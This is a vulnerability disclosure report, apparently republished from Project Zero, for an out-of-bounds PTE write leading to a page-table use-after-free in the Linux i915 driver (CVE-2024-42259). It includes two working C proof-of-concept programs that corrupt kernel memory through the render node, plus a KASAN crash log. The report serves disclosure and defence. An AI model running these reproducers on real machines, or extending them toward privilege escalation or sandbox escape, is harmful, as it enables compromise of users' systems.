Headline
Linux i915 PTE Use-After-Free
Linux i915 suffers from an out-of-bounds PTE write in vm_fault_gtt() that leads to a PTE use-after-free vulnerability.
I found a bug in the i915 code that allows a process with access to a rendernode (/dev/dri/renderD128) to corrupt kernel memory.This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-08-28.Summaryvm_fault_gtt() calls remap_io_mapping with an incorrect size; it should limitthe size to area->vm_end - {address passed to remap_io_mapping} instead ofarea->vm_end - area->vm_start.Bug description[For people reading this bug report who are not i915 experts: I highly recommendfirst reading sima's "i915/GEM Crashcourse" athttps://blog.ffwll.ch/2013/01/i915gem-crashcourse-overview.html. I wouldn'thave understood what's going on in this code without reading that.]I found a bug in vm_fault_gtt() in drivers/gpu/drm/i915/gem/i915_gem_mman.c.PTEs pointing into the GTT MMIO window are written as follows:/\* Now pin it into the GTT as needed \*/ vma = i915_gem_object_ggtt_pin_ww(obj, &ww, NULL, 0, 0, PIN_MAPPABLE | PIN_NONBLOCK /\* NOWARN \*/ | PIN_NOEVICT); if (IS_ERR(vma) && vma != ERR_PTR(-EDEADLK)) { /\* Use a partial view if it is bigger than available space \*/ struct i915_gtt_view view = compute_partial_view(obj, page_offset, MIN_CHUNK_PAGES); [...] vma = i915_gem_object_ggtt_pin_ww(obj, &ww, &view, 0, 0, flags); [...] } [...] /\* Finally, remap it using the new GTT offset \*/ ret = remap_io_mapping(area, area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT), (ggtt->gmadr.start + i915_ggtt_offset(vma)) >> PAGE_SHIFT, min_t(u64, vma->size, area->vm_end - area->vm_start), &ggtt->iomap); In the case where the first i915_gem_object_ggtt_pin_ww() call refuses tomap the whole object into the GTT MMIO window, for example because theobject is too big to fit into the window, a subrange of the object is mappedinstead. When this happens and the subrange is not at the start of the VMA,vma->gtt_view.partial.offset is nonzero.In this case, the size parameter passed to remap_io_mapping() is calculatedwrong: It is limited to the size of the VMA (area->vm_end - area->vm_start),but with an address that is higher than where the VMA starts(area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT)), so theend address is only limited toarea->vm_end + (vma->gtt_view.partial.offset << PAGE_SHIFT).When the VMA covers the whole object, this has no bad consequences because ofthe min_t(); but if the VMA is shorter than the object, PTEs can be writtenout of bounds.This can be tested with the following reproducer - on my system it causes"BUG: Bad page map" and "Bug: Bad rss-counter" errors when the reproducertries to exit:// written for a device with Xe Graphics (TGL GT2) #define _GNU_SOURCE #include <err.h> #include <fcntl.h> #include <stdio.h> #include <inttypes.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <drm/i915_drm.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) #define MiB \*(1024\*1024) void poke(volatile char \*p) { printf("poking %p\n", p); \*p = 1; } int main(void) { int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR)); struct drm_i915_gem_create gem_create = { .size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/ }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create)); printf("created GEM 0x%x\n", gem_create.handle); struct drm_i915_gem_mmap_offset mmap_offset_arg = { .handle = gem_create.handle, .flags = I915_MMAP_OFFSET_GTT }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg)); printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset); #define MAP_SIZE (128 MiB - 0x80000) volatile char \*map = (volatile char \*)SYSCHK(mmap(NULL, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd, mmap_offset_arg.offset)); printf("mapped from %p\n", map); poke(map + MAP_SIZE - 0x1000); poke(map); printf("mapped to %p\n", map + MAP_SIZE); } Code historyThe current form of the buggy code is from commit c58305af1835 ("drm/i915: Useremap_io_mapping() to prefault all PTE in a single pass", landed in v4.9), butI think back then it was unreachable because the code for constructing a partialview limited the partial view's size based on the VMA bounds back then: view.params.partial.size = min_t(unsigned int, chunk_size, (area->vm_end - area->vm_start) / PAGE_SIZE - view.params.partial.offset); This safety was removed in commit 8201c1fad4f4 ("drm/i915: Clip the partialview against the object not vma", first in v4.11). I suspect the bug becamehittable after that point.Most places in the kernel that install PFNMAP PTEs use helpers likeremap_pfn_range() that make sure the passed range fits into the specified VMA;but it looks like i915 doesn't use those because it wants to be able to clobberexisting PTEs, which the usual helpers treat as an error.(See commit 0e4fe0c9f2f9 ("Revert "i915: use io_mapping_map_user"").)i915 instead uses its own helper remap_io_mapping(), which just writes PTEsin the specified virtual address range.ExploitabilityOne consequence of this bug is that, because PFNMAP PTEs are written outside theregion covered by the VMA, the MM subsystem can't shoot them down when thedriver wants to revoke userspace's access to the region. So this could probablybe used to gain access to memory that is later mapped into the GTT in the MMIOwindow - but I don't know enough about i915 to tell whether that is bad orwhether shaders always have access to all GTT memory anyway.Probably another consequence would be that if you had a VMA at the end of theuserspace virtual address space, you could get memory mapped into the kernelhalf of memory? But that probably wouldn't lead to anything overly bad...The one way I know of to turn this bug into something that is definitely badis to turn it into page table UAF, like inhttps://crbug.com/project-zero/2350:When you're only holding the mmap_lock in read mode (like in a page faulthandler), page tables that are not needed by any VMA can be freed concurrently.So if we have one GTT-backed VMA directly ahead of a second VMA, and thenconcurrently trigger a fault in the GTT-backed VMA while unmapping the secondVMA, the out-of-bounds page table access off of the first VMA can walk pagetables that are concurrently freed.I tested this in a v6.9.2 kernel build with CONFIG_KASAN=y (for detecting UAFaccess) and CONFIG_RCU_STRICT_GRACE_PERIOD=y (a debugging option that makes RCUgrace periods much shorter at the expense of performance, which makes it easierto detect use-after-free bugs for objects that are RCU-freed), using thefollowing reproducer, running on a system with Xe Graphics (TGL GT2):// written for a device with Xe Graphics (TGL GT2) #define _GNU_SOURCE #include <pthread.h> #include <err.h> #include <fcntl.h> #include <stdio.h> #include <inttypes.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <drm/i915_drm.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) #define MiB \*(1024\*1024) // virtual address at the boundary between PGD entries #define PGD_BOUNDARY_ADDR 0x8000000000 #define MAP_SIZE (128 MiB - 0x80000) #define LEFT_MAPPING_ADDR (PGD_BOUNDARY_ADDR - MAP_SIZE) #define FLIPPER_MAP_SIZE 0x200000 static void \*flipper_thread_fn(void \*dummy) { int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR)); struct drm_i915_gem_create gem_create = { .size = FLIPPER_MAP_SIZE }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create)); printf("flipper created GEM 0x%x\n", gem_create.handle); struct drm_i915_gem_mmap_offset mmap_offset_arg = { .handle = gem_create.handle, .flags = I915_MMAP_OFFSET_GTT }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg)); printf("flipper fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset); while (1) { SYSCHK(mmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset)); SYSCHK(munmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE)); } return NULL; } int main(void) { pthread_t flipper_thread; if (pthread_create(&flipper_thread, NULL, flipper_thread_fn, NULL)) errx(1, "pthread_create"); int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR)); struct drm_i915_gem_create gem_create = { .size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/ }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create)); printf("created GEM 0x%x\n", gem_create.handle); struct drm_i915_gem_mmap_offset mmap_offset_arg = { .handle = gem_create.handle, .flags = I915_MMAP_OFFSET_GTT }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg)); printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset); while (1) { SYSCHK(mmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset)); \*(volatile char \*)(PGD_BOUNDARY_ADDR - 0x1000); SYSCHK(munmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE)); } } With that, I quickly got a KASAN splat (guess unwind lines removed):[ 906.394685] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF [ 906.657887] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF [ 906.819808] ================================================================== [ 906.819819] BUG: KASAN: use-after-free in pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416) [ 906.819827] Read of size 8 at addr ffff888180919000 by task linux-i915-oob-/3809 [ 906.819832] CPU: 3 PID: 3809 Comm: linux-i915-oob- Not tainted 6.9.2 #3 [ 906.819835] Hardware name: [...] [ 906.819838] Call Trace: [ 906.819839] <TASK> [ 906.819841] dump_stack_lvl (lib/dump_stack.c:117 (discriminator 1)) [ 906.819847] print_report (mm/kasan/report.c:378 mm/kasan/report.c:488) [ 906.819859] kasan_report (mm/kasan/report.c:603) [ 906.819865] pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416) [ 906.819869] __pte_alloc (mm/memory.c:445) [ 906.819886] __apply_to_page_range (mm/memory.c:2728 mm/memory.c:2788 mm/memory.c:2824 mm/memory.c:2860 mm/memory.c:2894) [ 906.819893] remap_io_mapping (drivers/gpu/drm/i915/i915_mm.c:110) [ 906.819905] vm_fault_gtt (drivers/gpu/drm/i915/gem/i915_gem_mman.c:411) [ 906.819924] __do_fault (mm/memory.c:4531) [ 906.819927] do_fault (mm/memory.c:4894 mm/memory.c:5024) [ 906.819931] __handle_mm_fault (mm/memory.c:3880 mm/memory.c:5300 mm/memory.c:5441) [ 906.819948] handle_mm_fault (mm/memory.c:5466 mm/memory.c:5622) [ 906.819951] do_user_addr_fault (arch/x86/mm/fault.c:1384) [ 906.819959] exc_page_fault (./arch/x86/include/asm/irqflags.h:37 ./arch/x86/include/asm/irqflags.h:72 arch/x86/mm/fault.c:1482 arch/x86/mm/fault.c:1532) [ 906.819963] asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:623) [ 906.819967] RIP: 0033:0x561a370af516 [ 906.819970] Code: 48 83 7d e8 ff 75 19 48 8d 05 26 0d 00 00 48 89 c6 bf 01 00 00 00 b8 00 00 00 00 e8 64 fb ff ff 48 b8 00 f0 ff ff 7f 00 00 00 <0f> b6 00 be 00 00 f8 07 48 b8 00 00 08 f8 7f 00 00 00 48 89 c7 e8 All code ======== 0: 48 83 7d e8 ff cmpq $0xffffffffffffffff,-0x18(%rbp) 5: 75 19 jne 0x20 7: 48 8d 05 26 0d 00 00 lea 0xd26(%rip),%rax # 0xd34 e: 48 89 c6 mov %rax,%rsi 11: bf 01 00 00 00 mov $0x1,%edi 16: b8 00 00 00 00 mov $0x0,%eax 1b: e8 64 fb ff ff call 0xfffffffffffffb84 20: 48 b8 00 f0 ff ff 7f movabs $0x7ffffff000,%rax 27: 00 00 00 2a:\* 0f b6 00 movzbl (%rax),%eax <-- trapping instruction 2d: be 00 00 f8 07 mov $0x7f80000,%esi 32: 48 b8 00 00 08 f8 7f movabs $0x7ff8080000,%rax 39: 00 00 00 3c: 48 89 c7 mov %rax,%rdi 3f: e8 .byte 0xe8 Code starting with the faulting instruction =========================================== 0: 0f b6 00 movzbl (%rax),%eax 3: be 00 00 f8 07 mov $0x7f80000,%esi 8: 48 b8 00 00 08 f8 7f movabs $0x7ff8080000,%rax f: 00 00 00 12: 48 89 c7 mov %rax,%rdi 15: e8 .byte 0xe8 [ 906.819973] RSP: 002b:00007ffdd0b75430 EFLAGS: 00010213 [ 906.819976] RAX: 0000007ffffff000 RBX: 00007ffdd0b755a8 RCX: 00007f8a3a3848a3 [ 906.819978] RDX: 0000000000000003 RSI: 0000000007f80000 RDI: 0000007ff8080000 [ 906.819980] RBP: 00007ffdd0b75490 R08: 0000000000000003 R09: 0000000135188000 [ 906.819982] R10: 0000000000100001 R11: 0000000000000246 R12: 0000000000000000 [ 906.819984] R13: 00007ffdd0b755b8 R14: 0000561a370b1dd8 R15: 00007f8a3a4b9020 [ 906.819987] </TASK> [ 906.819990] The buggy address belongs to the physical page: [ 906.819992] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x180919 [ 906.819994] flags: 0x4000000000000000(zone=1) [ 906.819997] page_type: 0xffffffff() [ 906.820000] raw: 4000000000000000 ffffea0006024688 ffffea0006024788 0000000000000000 [ 906.820002] raw: 0000000000000000 0000000000000001 00000000ffffffff 0000000000000000 [ 906.820004] page dumped because: kasan: bad access detected [ 906.820006] Memory state around the buggy address: [ 906.820008] ffff888180918f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 906.820010] ffff888180918f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 906.820011] >ffff888180919000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 906.820013] ^ [ 906.820014] ffff888180919080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 906.820016] ffff888180919100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 906.820017] ================================================================== This bug is probably not very interesting on Linux servers, since access tothe render node is typically only granted to UIDs who have locally signed into a machine; but it is probably relevant for things like ChromeOS, and maybealso for escaping from some types of sandboxed desktop applications?Related CVE Number: CVE-2024-42259.Found by: [email protected]
Related news
Ubuntu Security Notice USN-7088-1
Ubuntu Security Notice 7088-1 - Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.